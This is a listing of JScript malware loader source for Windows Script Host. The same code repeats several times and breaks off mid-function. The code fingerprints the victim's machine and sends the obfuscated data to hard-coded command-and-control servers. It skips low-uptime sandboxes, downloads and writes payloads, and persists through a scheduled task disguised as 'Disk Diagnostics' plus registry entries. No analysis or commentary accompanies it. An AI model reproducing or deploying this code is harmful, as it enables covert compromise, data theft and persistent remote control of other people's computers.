2637. DataTools.Random = {};
2638. DataTools.Random.Number = function(min, max){
2639. min = Math.ceil(min);
2640. max = Math.floor(max);
2641. return Math.floor(Math.random() * (max - min + 1)) + min;
2642. }
2643.  
2644. DataTools.Random.String = function(len){
2645. var alphabet = "qwertyuiopasdfghjklzxcvbnm";
2646. var result = "";
2647. for(var i = 0; i < len; i++){
2648. var chr = DataTools.Random.Number(0, alphabet.length-1);
2649. result = result.concat(alphabet.charAt(chr));
2650. }
2651.  
2652. return result;
2653. }
2654.  
2655.  
2656. DataTools.Strings = {};
2657. DataTools.Strings.ParseTemplate = function(str, templateStr){
2658. var template = templateStr.split('&');
2659. for(var i = 0; i < template.length; i++){
2660. var keyValue = template[i].split('=');
2661. str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
2662. }
2663.  
2664. return str;
2665. }
2666.  
2667. var Windows = {};
2668. Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
2669. Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
2670.  
2671. Windows.Execute = function(command){
2672. Windows.CoMainObject.Run(command);
2673. }
2674.  
2675. Windows.GetEnv = function(env){
2676. return Windows.CoMainObject.ExpandEnvironmentStrings(env);
2677. }
2678.  
2679. Windows.RegRead = function(path){
2680. return Windows.CoMainObject.RegRead(path);
2681. }
2682.  
2683. Windows.RegWrite = function(entry, value){
2684. Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
2685. }
2686.  
2687. Windows.CreateFile = function(path){
2688. var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
2689. fHandle.WriteLine(DataTools.Random.String(1024));
2690. fHandle.Close();
2691. }
2692.  
2693. Windows.AppendDataStream = function(path, stream, data){
2694. var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
2695. fHandle.WriteLine(data);
2696. fHandle.Close();
2697. }
2698.  
2699. Windows.AppendDataStreamB = function(path, stream, data){
2700. data.SaveToFile(path.concat(":").concat(stream), 2);
2701. data.Close();
2702. }
2703.  
2704. Windows.WriteData = function(path, data){
2705. var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
2706. fHandle.Write(data);
2707. fHandle.Close();
2708. }
2709.  
2710. Windows.WriteBytes = function(path, data){
2711. data.SaveToFile(path, 2);
2712. data.Close();
2713. }
2714.  
2715. Windows.WriteDataStreamBytes = function(path, stream, data){
2716. data.SaveToFile(path.concat(":").concat(stream), 2);
2717. data.Close();
2718. }
2719.  
2720. Windows.ReadFile = function(path){
2721. var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
2722. return fHandle.ReadAll();
2723. }
2724.  
2725. Windows.GetWMIProvider = function(pcname){
2726. return GetObject("winmgmts:"+
2727. "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
2728. }
2729.  
2730. Windows.GetUptime = function(){
2731. try{
2732. var wmi = Windows.GetWMIProvider(".");
2733. var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
2734. var e = new Enumerator(queryResult);
2735.  
2736. return parseInt(e.item().SystemUpTime);
2737. }catch(e){
2738. return 0;
2739. }
2740. }
2741.  
2742. Windows.GetArch = function(){
2743. var architecture = "64";
2744. var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
2745.  
2746. if(product.indexOf('Windows 7') != -1){
2747. architecture = "32";
2748. }
2749.  
2750. return architecture;
2751. }
2752.  
2753.  
2754. var Http = {};
2755. Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
2756. Http.Request = function(url){
2757. try{
2758. Http.Client.Open('GET', url, false);
2759. Http.Client.Send();
2760.  
2761. if(Http.Client.Status == 200)
2762. return Http.Client.ResponseText;
2763. else
2764. return "";
2765. }catch(e){
2766. return ""
2767. }
2768. }
2769.  
2770.  
2771. var Loader = {};
2772. Loader.USERNAME = Windows.GetEnv("%username%");
2773. Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
2774. Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
2775. Loader.Uptime = Windows.GetUptime();
2776. Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
2777.  
2778. Loader.GetUid = function(){
2779. return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
2780. }
2781.  
2782. Loader.GetInitialRequest = function(nonce){
2783. var uid = Loader.GetUid();
2784. var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
2785.  
2786. var sessionKey = nonce + config.C2_OB_KEY;
2787. request = request.join(":");
2788. request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
2789. request = Base64Encode(request);
2790.  
2791. return encodeURIComponent(request);
2792. }
2793.  
2794. Loader.GetInitialEndpoint = function(){
2795. var nonce = DataTools.Random.String(12)
2796. var request = Loader.GetInitialRequest(nonce);
2797.  
2798. var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic&regclid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
2799. return endpoint;
2800. }
2801.  
2802. Loader.DeployHost = function(){
2803. var temp = Windows.GetEnv("%temp%");
2804. var architecture = Windows.GetArch();
2805. var nonce = DataTools.Random.String(12);
2806. var uid = Loader.GetUid();
2807. var sessionKey = nonce + config.C2_OB_KEY;
2808.  
2809. var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
2810. encodedId = Base64Encode(encodedId);
2811. encodedId = encodeURIComponent(encodedId);
2812.  
2813. var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
2814. pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
2815.  
2816. var filename = uid.concat(".bin");
2817.  
2818. Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
2819. return temp.concat("\\").concat(filename);
2820.  
2821. }
2822.  
2823. Loader.DeployClient = function() {
2824. if (Loader.Uptime <= 3000) {
2825. WScript.Quit(0);
2826. }
2827.  
2828. for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
2829. for (var j = 0; j < config.PRIMARY_C2.length; j++) {
2830. try {
2831. var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
2832. response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
2833.  
2834. if (response.indexOf('<<<CLIENT__') !== -1) {
2835. var client = response.replace('<<<CLIENT__', '');
2836. client = Base64text(client);
2837.  
2838. Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
2839. Windows.RegWrite("SetupServiceKey", Loader.GetUid());
2840.  
2841. SELECTED_C2 = config.PRIMARY_C2[j];
2842. Loader.Persist(client);
2843. return;
2844.  
2845. }
2846. } catch (e) {
2847.  
2848. }
2849.  
2850. WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
2851. }
2852. }
2853. }
2854.  
2855. Loader.Persist = function(client){
2856.  
2857. var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
2858. var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
2859.  
2860. Windows.Execute(taskCommand);
2861. Windows.RegWrite("ServerUrl", client);
2862. Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
2863.  
2864. Windows.CreateFile(GlobalStrings.NTFILE_PATH);
2865.  
2866. Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
2867.  
2868. Loader.DeployHost();
2869. }
2870.  
2871. function debug(message){
2872. ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
2873. }
2874.  
2875.  
2876. function Base64text(string){
2877. var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
2878. var element = XmlDOM.createElement("tempContainer");
2879. element.dataType = "bin.Base64";
2880. element.text = string;
2881.  
2882. var stream = WScript.CreateObject("ADODB.Stream");
2883. stream.Type = 1;
2884. stream.Open();
2885. stream.Write(element.nodeTypedValue);
2886.  
2887. stream.Position = 0;
2888. stream.Type = 2;
2889. stream.CharSet = "utf-8";
2890.  
2891. return stream.ReadText();
2892. }
2893.  
2894. function StringToBinary(string){
2895. var BinaryStream = new ActiveXObject("ADODB.Stream");
2896. BinaryStream.Type = 2;
2897. BinaryStream.CharSet = "ascii";
2898. BinaryStream.Open();
2899. BinaryStream.WriteText(string);
2900. BinaryStream.Position = 0;
2901. BinaryStream.Type = 1;
2902. BinaryStream.Position = 0;
2903. return BinaryStream.Read();
2904. }
2905.  
2906.  
2907. function Base64bytes(string){
2908. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
2909. var element = XmlDOM.createElement("Base64Data");
2910. element.dataType = "bin.base64";
2911.  
2912. element.text = string;
2913.  
2914. var stream = WScript.CreateObject("ADODB.Stream");
2915. stream.Type = 1;
2916. stream.Open();
2917.  
2918. stream.Write(element.nodeTypedValue);
2919. return stream;
2920. }
2921.  
2922. function Base64Encode(string) {
2923.  
2924. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
2925. var element = XmlDOM.createElement("Base64Data");
2926. element.dataType = "bin.base64";
2927.  
2928. element.nodeTypedValue = StringToBinary(string);
2929.  
2930. return element.text.replace(/\n/g, "").replace(/\/\//g, "");
2931. }
2932.  
2933.  
2934. if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
2935. Loader.DeployClient();
2936. }
2937. var config = {
2938. PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
2939. SOFT_SIG : 'mad29',
2940. SOFT_VERSION: 32,
2941. C2_REQUEST_SLEEP : 21,
2942. C2_FAIL_SLEEP : 21,
2943. C2_FAIL_COUNT : 20,
2944. C2_OB_KEY : 'JxTRG4mY',
2945.  
2946.  
2947. C2_PREFIX : 'rpc.aspx'
2948. }
2949.  
2950.  
2951. var SELECTED_C2 = config.PRIMARY_C2[0];
2952.  
2953.  
2954. Math.imul = function (a, b) {
2955. var ah = (a >>> 16) & 0xffff;
2956. var al = a & 0xffff;
2957. var bh = (b >>> 16) & 0xffff;
2958. var bl = b & 0xffff;
2959. return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
2960. };
2961.  
2962.  
2963. var GlobalStrings = {
2964. REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
2965. WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
2966. WMIC_EXEC : "wmic process call create \"%path%\"",
2967. TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
2968. TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
2969. NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
2970. ADS_SSID : "HDDScan",
2971. PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
2972. TASK_NAME : "Disk Diagnostics"
2973. }
2974.  
2975.  
2976. var ObjectProducer = {}
2977. ObjectProducer.AccesibleObjects = {
2978. MAIN_SH_OBJECT : 'WScript.Shell',
2979. STREAM_ACCESS_OBJECT : 'ADODB.Stream',
2980. XML_TREE_OBJECT : 'Microsoft.XMLDOM',
2981. XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
2982. HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
2983. FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
2984. };
2985.  
2986. ObjectProducer.GetRootConstructor = function(){
2987. return ActiveXObject;
2988. }
2989.  
2990. ObjectProducer.GetInstance = function(instanceKey){
2991. var rootConstructor = ObjectProducer.GetRootConstructor();
2992. return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
2993. }
2994.  
2995.  
2996.  
2997. var DataTools = {};
2998. DataTools.KEY_BASE = 1029;
2999.  
3000. DataTools.DeriveKey = function(keyStr){
3001. var keyBase = DataTools.KEY_BASE;
3002. var key = 0;
3003.  
3004. for(var i = 0; i < keyStr.length; i++){
3005. keyBase = keyBase ^ keyStr.charCodeAt(i);
3006. }
3007.  
3008. var _keyBase = keyBase.toString();
3009. for(var i = 0; i < _keyBase.length; i++){
3010. key += parseInt(_keyBase.charAt(i));
3011. }
3012.  
3013. return key;
3014. }
3015.  
3016. DataTools.RotString = function(str, key){
3017. var rotd = "";
3018. for(var i = 0; i < str.length; i++){
3019. rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
3020. }
3021.  
3022. return rotd;
3023. }
3024.  
3025. DataTools.Hash = function(str){
3026. for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
3027. h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
3028.  
3029. return ((h ^ h >>> 16) >>> 0).toString(16);
3030. }
3031.  
3032. DataTools.Random = {};
3033. DataTools.Random.Number = function(min, max){
3034. min = Math.ceil(min);
3035. max = Math.floor(max);
3036. return Math.floor(Math.random() * (max - min + 1)) + min;
3037. }
3038.  
3039. DataTools.Random.String = function(len){
3040. var alphabet = "qwertyuiopasdfghjklzxcvbnm";
3041. var result = "";
3042. for(var i = 0; i < len; i++){
3043. var chr = DataTools.Random.Number(0, alphabet.length-1);
3044. result = result.concat(alphabet.charAt(chr));
3045. }
3046.  
3047. return result;
3048. }
3049.  
3050.  
3051. DataTools.Strings = {};
3052. DataTools.Strings.ParseTemplate = function(str, templateStr){
3053. var template = templateStr.split('&');
3054. for(var i = 0; i < template.length; i++){
3055. var keyValue = template[i].split('=');
3056. str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
3057. }
3058.  
3059. return str;
3060. }
3061.  
3062. var Windows = {};
3063. Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
3064. Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
3065.  
3066. Windows.Execute = function(command){
3067. Windows.CoMainObject.Run(command);
3068. }
3069.  
3070. Windows.GetEnv = function(env){
3071. return Windows.CoMainObject.ExpandEnvironmentStrings(env);
3072. }
3073.  
3074. Windows.RegRead = function(path){
3075. return Windows.CoMainObject.RegRead(path);
3076. }
3077.  
3078. Windows.RegWrite = function(entry, value){
3079. Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
3080. }
3081.  
3082. Windows.CreateFile = function(path){
3083. var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
3084. fHandle.WriteLine(DataTools.Random.String(1024));
3085. fHandle.Close();
3086. }
3087.  
3088. Windows.AppendDataStream = function(path, stream, data){
3089. var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
3090. fHandle.WriteLine(data);
3091. fHandle.Close();
3092. }
3093.  
3094. Windows.AppendDataStreamB = function(path, stream, data){
3095. data.SaveToFile(path.concat(":").concat(stream), 2);
3096. data.Close();
3097. }
3098.  
3099. Windows.WriteData = function(path, data){
3100. var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
3101. fHandle.Write(data);
3102. fHandle.Close();
3103. }
3104.  
3105. Windows.WriteBytes = function(path, data){
3106. data.SaveToFile(path, 2);
3107. data.Close();
3108. }
3109.  
3110. Windows.WriteDataStreamBytes = function(path, stream, data){
3111. data.SaveToFile(path.concat(":").concat(stream), 2);
3112. data.Close();
3113. }
3114.  
3115. Windows.ReadFile = function(path){
3116. var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
3117. return fHandle.ReadAll();
3118. }
3119.  
3120. Windows.GetWMIProvider = function(pcname){
3121. return GetObject("winmgmts:"+
3122. "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
3123. }
3124.  
3125. Windows.GetUptime = function(){
3126. try{
3127. var wmi = Windows.GetWMIProvider(".");
3128. var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
3129. var e = new Enumerator(queryResult);
3130.  
3131. return parseInt(e.item().SystemUpTime);
3132. }catch(e){
3133. return 0;
3134. }
3135. }
3136.  
3137. Windows.GetArch = function(){
3138. var architecture = "64";
3139. var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
3140.  
3141. if(product.indexOf('Windows 7') != -1){
3142. architecture = "32";
3143. }
3144.  
3145. return architecture;
3146. }
3147.  
3148.  
3149. var Http = {};
3150. Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
3151. Http.Request = function(url){
3152. try{
3153. Http.Client.Open('GET', url, false);
3154. Http.Client.Send();
3155.  
3156. if(Http.Client.Status == 200)
3157. return Http.Client.ResponseText;
3158. else
3159. return "";
3160. }catch(e){
3161. return ""
3162. }
3163. }
3164.  
3165.  
3166. var Loader = {};
3167. Loader.USERNAME = Windows.GetEnv("%username%");
3168. Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
3169. Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
3170. Loader.Uptime = Windows.GetUptime();
3171. Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
3172.  
3173. Loader.GetUid = function(){
3174. return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
3175. }
3176.  
3177. Loader.GetInitialRequest = function(nonce){
3178. var uid = Loader.GetUid();
3179. var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
3180.  
3181. var sessionKey = nonce + config.C2_OB_KEY;
3182. request = request.join(":");
3183. request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
3184. request = Base64Encode(request);
3185.  
3186. return encodeURIComponent(request);
3187. }
3188.  
3189. Loader.GetInitialEndpoint = function(){
3190. var nonce = DataTools.Random.String(12)
3191. var request = Loader.GetInitialRequest(nonce);
3192.  
3193. var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic&regclid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
3194. return endpoint;
3195. }
3196.  
3197. Loader.DeployHost = function(){
3198. var temp = Windows.GetEnv("%temp%");
3199. var architecture = Windows.GetArch();
3200. var nonce = DataTools.Random.String(12);
3201. var uid = Loader.GetUid();
3202. var sessionKey = nonce + config.C2_OB_KEY;
3203.  
3204. var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
3205. encodedId = Base64Encode(encodedId);
3206. encodedId = encodeURIComponent(encodedId);
3207.  
3208. var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
3209. pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
3210.  
3211. var filename = uid.concat(".bin");
3212.  
3213. Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
3214. return temp.concat("\\").concat(filename);
3215.  
3216. }
3217.  
3218. Loader.DeployClient = function() {
3219. if (Loader.Uptime <= 3000) {
3220. WScript.Quit(0);
3221. }
3222.  
3223. for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
3224. for (var j = 0; j < config.PRIMARY_C2.length; j++) {
3225. try {
3226. var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
3227. response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
3228.  
3229. if (response.indexOf('<<<CLIENT__') !== -1) {
3230. var client = response.replace('<<<CLIENT__', '');
3231. client = Base64text(client);
3232.  
3233. Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
3234. Windows.RegWrite("SetupServiceKey", Loader.GetUid());
3235.  
3236. SELECTED_C2 = config.PRIMARY_C2[j];
3237. Loader.Persist(client);
3238. return;
3239.  
3240. }
3241. } catch (e) {
3242.  
3243. }
3244.  
3245. WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
3246. }
3247. }
3248. }
3249.  
3250. Loader.Persist = function(client){
3251.  
3252. var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
3253. var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
3254.  
3255. Windows.Execute(taskCommand);
3256. Windows.RegWrite("ServerUrl", client);
3257. Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
3258.  
3259. Windows.CreateFile(GlobalStrings.NTFILE_PATH);
3260.  
3261. Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
3262.  
3263. Loader.DeployHost();
3264. }
3265.  
3266. function debug(message){
3267. ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
3268. }
3269.  
3270.  
3271. function Base64text(string){
3272. var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
3273. var element = XmlDOM.createElement("tempContainer");
3274. element.dataType = "bin.Base64";
3275. element.text = string;
3276.  
3277. var stream = WScript.CreateObject("ADODB.Stream");
3278. stream.Type = 1;
3279. stream.Open();
3280. stream.Write(element.nodeTypedValue);
3281.  
3282. stream.Position = 0;
3283. stream.Type = 2;
3284. stream.CharSet = "utf-8";
3285.  
3286. return stream.ReadText();
3287. }
3288.  
3289. function StringToBinary(string){
3290. var BinaryStream = new ActiveXObject("ADODB.Stream");
3291. BinaryStream.Type = 2;
3292. BinaryStream.CharSet = "ascii";
3293. BinaryStream.Open();
3294. BinaryStream.WriteText(string);
3295. BinaryStream.Position = 0;
3296. BinaryStream.Type = 1;
3297. BinaryStream.Position = 0;
3298. return BinaryStream.Read();
3299. }
3300.  
3301.  
3302. function Base64bytes(string){
3303. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
3304. var element = XmlDOM.createElement("Base64Data");
3305. element.dataType = "bin.base64";
3306.  
3307. element.text = string;
3308.  
3309. var stream = WScript.CreateObject("ADODB.Stream");
3310. stream.Type = 1;
3311. stream.Open();
3312.  
3313. stream.Write(element.nodeTypedValue);
3314. return stream;
3315. }
3316.  
3317. function Base64Encode(string) {
3318.  
3319. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
3320. var element = XmlDOM.createElement("Base64Data");
3321. element.dataType = "bin.base64";
3322.  
3323. element.nodeTypedValue = StringToBinary(string);
3324.  
3325. return element.text.replace(/\n/g, "").replace(/\/\//g, "");
3326. }
3327.  
3328.  
3329. if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
3330. Loader.DeployClient();
3331. }
3332. var config = {
3333. PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
3334. SOFT_SIG : 'mad29',
3335. SOFT_VERSION: 32,
3336. C2_REQUEST_SLEEP : 21,
3337. C2_FAIL_SLEEP : 21,
3338. C2_FAIL_COUNT : 20,
3339. C2_OB_KEY : 'JxTRG4mY',
3340.  
3341.  
3342. C2_PREFIX : 'rpc.aspx'
3343. }
3344.  
3345.  
3346. var SELECTED_C2 = config.PRIMARY_C2[0];
3347.  
3348.  
3349. Math.imul = function (a, b) {
3350. var ah = (a >>> 16) & 0xffff;
3351. var al = a & 0xffff;
3352. var bh = (b >>> 16) & 0xffff;
3353. var bl = b & 0xffff;
3354. return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
3355. };
3356.  
3357.  
3358. var GlobalStrings = {
3359. REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
3360. WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
3361. WMIC_EXEC : "wmic process call create \"%path%\"",
3362. TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
3363. TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
3364. NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
3365. ADS_SSID : "HDDScan",
3366. PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
3367. TASK_NAME : "Disk Diagnostics"
3368. }
3369.  
3370.  
3371. var ObjectProducer = {}
3372. ObjectProducer.AccesibleObjects = {
3373. MAIN_SH_OBJECT : 'WScript.Shell',
3374. STREAM_ACCESS_OBJECT : 'ADODB.Stream',
3375. XML_TREE_OBJECT : 'Microsoft.XMLDOM',
3376. XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
3377. HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
3378. FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
3379. };
3380.  
3381. ObjectProducer.GetRootConstructor = function(){
3382. return ActiveXObject;
3383. }
3384.  
3385. ObjectProducer.GetInstance = function(instanceKey){
3386. var rootConstructor = ObjectProducer.GetRootConstructor();
3387. return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
3388. }
3389.  
3390.  
3391.  
3392. var DataTools = {};
3393. DataTools.KEY_BASE = 1029;
3394.  
3395. DataTools.DeriveKey = function(keyStr){
3396. var keyBase = DataTools.KEY_BASE;
3397. var key = 0;
3398.  
3399. for(var i = 0; i < keyStr.length; i++){
3400. keyBase = keyBase ^ keyStr.charCodeAt(i);
3401. }
3402.  
3403. var _keyBase = keyBase.toString();
3404. for(var i = 0; i < _keyBase.length; i++){
3405. key += parseInt(_keyBase.charAt(i));
3406. }
3407.  
3408. return key;
3409. }
3410.  
3411. DataTools.RotString = function(str, key){
3412. var rotd = "";
3413. for(var i = 0; i < str.length; i++){
3414. rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
3415. }
3416.  
3417. return rotd;
3418. }
3419.  
3420. DataTools.Hash = function(str){
3421. for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
3422. h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
3423.  
3424. return ((h ^ h >>> 16) >>> 0).toString(16);
3425. }
3426.  
3427. DataTools.Random = {};
3428. DataTools.Random.Number = function(min, max){
3429. min = Math.ceil(min);
3430. max = Math.floor(max);
3431. return Math.floor(Math.random() * (max - min + 1)) + min;
3432. }
3433.  
3434. DataTools.Random.String = function(len){
3435. var alphabet = "qwertyuiopasdfghjklzxcvbnm";
3436. var result = "";
3437. for(var i = 0; i < len; i++){
3438. var chr = DataTools.Random.Number(0, alphabet.length-1);
3439. result = result.concat(alphabet.charAt(chr));
3440. }
3441.  
3442. return result;
3443. }
3444.  
3445.  
3446. DataTools.Strings = {};
3447. DataTools.Strings.ParseTemplate = function(str, templateStr){
3448. var template = templateStr.split('&');
3449. for(var i = 0; i < template.length; i++){
3450. var keyValue = template[i].split('=');
3451. str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
3452. }
3453.  
3454. return str;
3455. }
3456.  
3457. var Windows = {};
3458. Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
3459. Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
3460.  
3461. Windows.Execute = function(command){
3462. Windows.CoMainObject.Run(command);
3463. }
3464.  
3465. Windows.GetEnv = function(env){
3466. return Windows.CoMainObject.ExpandEnvironmentStrings(env);
3467. }
3468.  
3469. Windows.RegRead = function(path){
3470. return Windows.CoMainObject.RegRead(path);
3471. }
3472.  
3473. Windows.RegWrite = function(entry, value){
3474. Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
3475. }
3476.  
3477. Windows.CreateFile = function(path){
3478. var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
3479. fHandle.WriteLine(DataTools.Random.String(1024));
3480. fHandle.Close();
3481. }
3482.  
3483. Windows.AppendDataStream = function(path, stream, data){
3484. var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
3485. fHandle.WriteLine(data);
3486. fHandle.Close();
3487. }
3488.  
3489. Windows.AppendDataStreamB = function(path, stream, data){
3490. data.SaveToFile(path.concat(":").concat(stream), 2);
3491. data.Close();
3492. }
3493.  
3494. Windows.WriteData = function(path, data){
3495. var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
3496. fHandle.Write(data);
3497. fHandle.Close();
3498. }
3499.  
3500. Windows.WriteBytes = function(path, data){
3501. data.SaveToFile(path, 2);
3502. data.Close();
3503. }
3504.  
3505. Windows.WriteDataStreamBytes = function(path, stream, data){
3506. data.SaveToFile(path.concat(":").concat(stream), 2);
3507. data.Close();
3508. }
3509.  
3510. Windows.ReadFile = function(path){
